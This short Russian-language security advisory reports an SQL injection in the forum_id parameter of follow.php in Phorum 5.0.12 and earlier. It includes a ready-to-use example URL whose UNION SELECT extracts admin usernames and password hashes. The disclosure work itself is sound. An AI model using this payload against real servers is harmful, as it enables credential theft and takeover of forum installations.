Программа: Phorum 5.0.12 и более ранние версии 

Удаленный атакующий может выполнить произвольный SQL команды на уязвимом сервере.
Уязвимость существует из-за некорректной фильтрации данных в параметре forum_id файла 'follow.php'. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный SQL код на целевом сервере.

Пример: 

http://[target]/phorum5012/follow.php?forum_id=1 &,f00=bar,1=-99%20UNION%20ALL%20SELECT
%201%2c1%2c1%2c1%2c1%2cCONCAT (username%2c%27|%27%2cpassword)%2c1%2c1
%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c 1%2c1%2c1%2c1%20FROM%20phorum_users%
20WHERE%20admin=1

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии